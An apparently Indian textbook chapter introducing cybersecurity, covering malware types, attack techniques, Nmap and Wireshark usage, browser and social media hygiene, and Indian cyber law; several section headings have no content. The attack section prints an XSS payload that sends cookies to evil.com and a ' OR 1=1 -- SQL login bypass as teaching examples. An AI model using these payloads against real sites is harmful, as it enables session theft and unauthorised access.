Unit 3: Introduction to Cyber Security & Secure Web Browsing

Opening Hook — When India's Biggest Hospital Went Dark

Learning Outcomes — Bloom's Taxonomy Mapped

Concept Explanation — Cybersecurity from Scratch

1. The CIA Triad — Foundation of All Cybersecurity

Every cybersecurity decision in the world — from protecting your Instagram account to securing India's nuclear facilities — is based on three fundamental principles. Together, they form the CIA Triad. No, not the American spy agency — this CIA stands for Confidentiality, Integrity, and Availability.

Analogy — The SBI Bank Locker: Imagine you rent a locker at State Bank of India. Confidentiality = only YOU have the key; no one else can open it. Integrity = nobody tampers with your documents inside; they remain exactly as you left them. Availability = the bank is open whenever you need to access your locker; it doesn't shut down randomly.

Now YOU try it → Think about your college's student portal. How does it implement Confidentiality (login credentials), Integrity (exam marks can't be changed by students), and Availability (accessible during result declaration)? Write one example for each.

2. Information Security vs Cybersecurity

Students often use these terms interchangeably, but they have a critical difference. Think of it this way: Information Security is the ocean; Cybersecurity is a very large lake within that ocean.

3. Threat Landscape — Types of Cyber Threats

Before you can defend against threats, you need to understand who's attacking and why. The threat landscape is vast and varied — from bored teenagers to nation-state hackers backed by foreign governments.

4. Malware — The Digital Arsenal

Malware (malicious software) is any software intentionally designed to cause damage, steal data, or gain unauthorised access. Think of it as the weapons in a cybercriminal's toolkit. Understanding each type is essential for identifying and defending against them.

Virus — The Attached Parasite

A virus attaches itself to a legitimate file or program and activates when the user opens it. It cannot spread on its own — it needs human action. Analogy: Like the common cold — you get it by touching an infected surface (opening an infected file). You then spread it by sharing that file.

Worm — The Self-Replicating Spreader

Unlike viruses, worms spread automatically across networks without any user action. They exploit vulnerabilities in operating systems and software. Analogy: Like COVID-19 — spreads on its own through a network (population) without needing anyone to actively pass it.

Trojan Horse — The Disguised Intruder

Disguised as legitimate software, a Trojan tricks users into installing it. Once inside, it opens a backdoor for attackers. Analogy: Like a fake Paytm app on a third-party app store — looks exactly like the real one but steals your UPI PIN when you enter it.

Ransomware — The Digital Kidnapper

Encrypts all your files and demands payment (usually in cryptocurrency) to unlock them. Example: WannaCry (2017) affected 200,000+ computers across 150 countries. AIIMS Delhi (2022) — ₹200 crore demanded. Analogy: Like a kidnapper locking your house and demanding ransom for the key. Even if you pay, there's no guarantee you'll get the key.

Spyware — The Silent Watcher

Secretly monitors user activity — keystrokes, browsing history, webcam, microphone. Example: Pegasus spyware by NSO Group was used to monitor Indian journalists, politicians, and activists (2021 investigation by The Wire). Analogy: Like hidden CCTV in your room recording everything without your knowledge.

Adware — The Annoying Advertiser

Displays unwanted advertisements, often bundled with free software. While less dangerous, it slows systems and can be a gateway for worse malware. Example: ~30% of apps on third-party Android stores in India contain adware.

Rootkit — The Deep Infiltrator

Hides deep within the operating system, modifying core functions to avoid detection. Extremely difficult to find and remove. Analogy: Like a spy with a fake government ID — operating within the system while being virtually invisible to security checks.

Keylogger — The Keystroke Thief

Records every keystroke you type — passwords, credit card numbers, messages. Can be software-based or a physical hardware device plugged into a keyboard. Example: Commonly installed on shared cybercafe computers in India to steal banking passwords.

5. Attack Types & Techniques

Malware is the weapon. Attack techniques are HOW cybercriminals use those weapons. Understanding attack types is crucial because most attacks use similar patterns — and recognising the pattern is the first step to stopping it.

Phishing — The Fake Bait

Sending fraudulent emails/messages that mimic legitimate organisations to trick users into revealing sensitive information. Example: A fake SBI email saying "Your account will be blocked. Click here to verify: http://sbi-secure-verify.com.ng" — notice the Nigerian domain (.ng)!

India reported 3.18 lakh phishing attacks in 2022 (CERT-In). Phishing is the #1 attack vector in India, responsible for over 60% of initial compromises.

Spear Phishing — The Targeted Strike

Unlike mass phishing, spear phishing targets specific individuals with personalised content. The attacker researches their target on LinkedIn, social media, and company websites. Example: An email to a CFO from what appears to be the CEO's email address: "Transfer ₹15 lakhs to this account urgently for a vendor payment. Keep it confidential."

DDoS (Distributed Denial of Service) — The Traffic Flood

Overwhelming a server or website with massive amounts of fake traffic, making it unavailable to legitimate users. Analogy: Imagine 10,000 people simultaneously trying to enter a shop with capacity for 50 — nobody gets through. Example: Indian government websites were hit with DDoS attacks during India-Pakistan tensions in 2019.

Man-in-the-Middle (MITM) — The Eavesdropper

An attacker secretly intercepts communication between two parties who believe they're communicating directly. Analogy: Someone secretly reading your letters, possibly modifying them, before delivering them to the recipient. Example: Using public WiFi at a café — an attacker on the same network intercepts your banking session.

SQL Injection — The Database Hack

Inserting malicious SQL code into web application input fields to manipulate the database. Example: Entering ' OR 1=1 -- in a login form to bypass authentication. This tricks the database into returning all records, potentially granting unauthorised access.

SQL Injection Example
-- Normal login query:
SELECT * FROM users WHERE username='admin' AND password='secret123';

-- Injected query (attacker enters: ' OR 1=1 -- in username field):
SELECT * FROM users WHERE username='' OR 1=1 --' AND password='anything';
-- The OR 1=1 always evaluates to TRUE, bypassing authentication!

Cross-Site Scripting (XSS) — The Script Injector

Injecting malicious JavaScript into web pages viewed by other users. Example: An attacker posts <script>document.location='http://evil.com/steal?cookie='+document.cookie</script> in a comment box. When other users view the comment, their session cookies are stolen.

Social Engineering — The Human Hack

Manipulating people psychologically into revealing confidential information. This doesn't exploit software — it exploits human trust. Example: "Hello sir, I'm calling from SBI. Your account has been flagged for suspicious activity. Please share your OTP to verify your identity." This is the #1 attack method in India.

6. Major Indian Cyber Attacks — Case Analysis

7. Industry Use Cases — Where Cybersecurity Matters Most

8. Cybersecurity Tools — Your Digital Arsenal

🔍 Nmap (Network Mapper) — The Swiss Army Knife

What it does: Discovers devices on a network, identifies open ports, detects running services, and even guesses the operating system. It's free, open-source, and used by both security professionals and ethical hackers worldwide.

Analogy: Like knocking on every door in an apartment building to see which ones are open, who lives there, and what they're doing. Except the "apartment building" is a computer network.

Nmap Commands
# Basic scan — find open ports on your own machine
nmap localhost

# Service version detection — what software is running?
nmap -sV localhost

# OS detection — what operating system is the target running?
nmap -O 192.168.1.1

# Ping scan — discover all devices on your home network
nmap -sn 192.168.1.0/24

# Save results to a file
nmap -oN my_scan.txt localhost

🦈 Wireshark — The Network Microscope

What it does: Captures and analyses every single packet of data flowing through your network in real-time. It's like putting your network traffic under a microscope — you can see every HTTP request, every DNS query, every packet.

Analogy: Like CCTV for your network — records every packet that enters or leaves, letting you replay and analyse any communication.

Basic Wireshark filters:

Wireshark Filters
# Show only HTTP traffic
http

# Show traffic on port 80
tcp.port == 80

# Show traffic from/to a specific IP
ip.addr == 192.168.1.1

# Show only DNS queries
dns

# Show only POST requests (often contain login data)
http.request.method == "POST"

🕵️ Maltego — The OSINT Detective

What it does: Gathers Open Source Intelligence (OSINT) — maps relationships between people, domains, IP addresses, email addresses, and social media accounts. Used for reconnaissance in penetration testing and investigation.

Analogy: Like a detective's investigation board with red strings connecting suspects, addresses, phone numbers, and clues — but automated and digital.

🔧 Burp Suite — The Web App Tester

What it does: Intercepts HTTP/HTTPS traffic between your browser and web applications. Lets you modify requests, find vulnerabilities (XSS, SQL injection, CSRF), and test authentication mechanisms.

Community Edition is free and sufficient for learning. Used by security testers at companies like Flipkart, Razorpay, and Paytm to test their applications before deployment.

9. AI-Based Threat Intelligence

The volume of cyberattacks is too large for humans to monitor alone. A single large organisation may generate 10,000+ security events per day. This is where AI and Machine Learning step in:

ML-Based Anomaly Detection

Train machine learning models on "normal" network traffic patterns. When the model sees something unusual — a server suddenly sending gigabytes of data to an unknown IP at 3 AM — it flags it as an anomaly. Analogy: Like a bank's fraud detection that alerts you when someone uses your credit card in another country.

Behavioral Analysis

Instead of looking for known attack signatures, behavioral analysis monitors user behavior. If an employee who normally logs in from Mumbai at 9 AM suddenly logs in from Russia at 3 AM and downloads 500 files — the system flags it. Indian use: HDFC Bank uses behavioral AI to detect fraudulent UPI transactions in real-time.

Automated Threat Response

AI systems that can automatically isolate infected machines, block suspicious IPs, and quarantine malware — without waiting for a human analyst. Response time drops from hours to milliseconds.

10. Secure Web Browsing

HTTP vs HTTPS — The Critical Difference

SSL/TLS Simplified: When you visit https://www.sbi.co.in, your browser and SBI's server perform a "handshake" — they agree on an encryption key. All data exchanged after this handshake is encrypted. Even if a hacker intercepts the traffic (e.g., on public WiFi), they'll see only gibberish. Analogy: Like two spies agreeing on a secret code before sending messages. Anyone who intercepts the messages can't read them without the code.

Browser Security Settings Checklist

• ✅ Enable HTTPS-Only Mode — Chrome/Firefox will warn you before loading HTTP sites
• ✅ Block third-party cookies — prevents cross-site tracking by advertisers
• ✅ Disable auto-fill for passwords on shared/public computers
• ✅ Keep browser updated — updates patch security vulnerabilities
• ✅ Use browser extensions: uBlock Origin (ad/tracker blocker), HTTPS Everywhere (forces HTTPS)
• ❌ Never save passwords in the browser on shared computers — use a password manager instead

VPN — Your Encrypted Tunnel

A VPN (Virtual Private Network) creates an encrypted tunnel between your device and a VPN server. All your internet traffic passes through this tunnel, making it invisible to your ISP, public WiFi hackers, and surveillance. When to use: Always on public WiFi (airports, cafes, hotels). When accessing sensitive data remotely.

Incognito Mode — Myths vs Reality

11. Social Media Security

Privacy Settings — What to Configure

• Instagram: Set account to Private, disable Activity Status, review Tagged Posts before they appear
• Facebook: Set posts to "Friends Only," disable profile search by phone number, review app permissions
• LinkedIn: Control who sees your connections, disable "People Also Viewed," review data sharing settings
• WhatsApp: Enable 2-Step Verification, set Profile Photo/Last Seen to "My Contacts," disable auto-download of media

Two-Factor Authentication (2FA) — Your Second Lock

2FA requires two different types of verification to log in: something you know (password) + something you have (phone/authenticator app). Even if a hacker steals your password, they can't log in without the second factor.

Best practice: Use authenticator apps (Google Authenticator, Microsoft Authenticator) instead of SMS-based OTP. SIM-swapping attacks can intercept SMS OTPs, but authenticator app codes are generated locally on your device.

Safe Posting Practices

• ❌ Never share boarding passes (contains PNR, personal details)
• ❌ Never post real-time location while travelling
• ❌ Never share PAN card, Aadhaar, or driving license photos
• ❌ Never post screenshots with visible email/phone numbers
• ✅ Wait until AFTER returning to post travel photos
• ✅ Remove EXIF metadata from photos before posting (contains GPS coordinates)

12. Indian Cybersecurity Framework

CERT-In (Indian Computer Emergency Response Team)

India's national agency for cybersecurity incident response, established under the IT Act 2000. CERT-In operates under MeitY (Ministry of Electronics and Information Technology).

• Issues vulnerability advisories and security alerts
• Coordinates incident response across government and private sector
• 2022 Directive: Mandatory reporting of cybersecurity incidents within 6 hours — one of the strictest timelines globally
• Maintains the Cyber Swachhta Kendra (Botnet Cleaning and Malware Analysis Centre)

IT Act 2000 (amended 2008) — Key Sections

DPDP Act 2023 (Digital Personal Data Protection Act)

India's equivalent of the EU's GDPR, passed in August 2023. Key provisions:

• Consent-based processing: Companies must obtain explicit consent before collecting personal data
• Data fiduciary obligations: Companies handling data must ensure its security and accuracy
• Right to erasure: Citizens can request deletion of their personal data
• Data Protection Board: New regulatory body to adjudicate data protection disputes
• Penalties: Up to ₹250 crore for significant data breaches and non-compliance
• Children's data: Special protections for data of individuals under 18

Bug Bounty Programs — Get Paid to Hack (Legally)

Companies pay ethical hackers ("white hats") to find and report vulnerabilities before criminals exploit them. This is a legitimate, well-paid career path.

• HackerOne: India is the #2 country by number of ethical hackers (after the US). Indian hackers earned $2.5 million on HackerOne in 2022 alone.
• Bugcrowd: Another major platform with programs from companies like Mastercard, Tesla, and Atlassian.
• Indian companies with bug bounty programs: Paytm, Zomato, Flipkart, Ola, MakeMyTrip, CRED
• Earning range: ₹5,000 for low-severity bugs to ₹50 lakh+ for critical vulnerabilities in major platforms

Learn by Doing — 3-Tier Lab Structure

CMD
nmap --version

CMD
nmap localhost

CMD
nmap -sV localhost

CMD
nmap -sn 192.168.1.0/24

CMD
nmap -sV localhost -oN my_nmap_scan_results.txt

Industry Spotlight — A Day in the Life

Earn With It — Freelance & Income Roadmap

⏱️ Time to First Earning: 3–4 weeks (if you complete all three lab tiers and start reaching out to local businesses)

MCQ Assessment Bank — 30 Questions (Bloom's Mapped)

Remember / Identify (Q1–Q5)

Understand / Explain (Q6–Q10)

Apply / Use (Q11–Q15)

Analyze / Classify (Q16–Q20)

Evaluate / Assess (Q21–Q25)

Create / Design (Q26–Q30)

Short Answer Questions (2–3 Marks Each)

Case Studies (10 Marks Each)

Chapter Summary — Tweet-Sized Takeaways

Earning Checkpoint — What You Can Earn After This Chapter

✅ Unit 3 complete. Ready for Unit 4: DevOps & Software Engineering!

[QR: Link to EduArtha video tutorial — Cyber Security & Secure Web Browsing]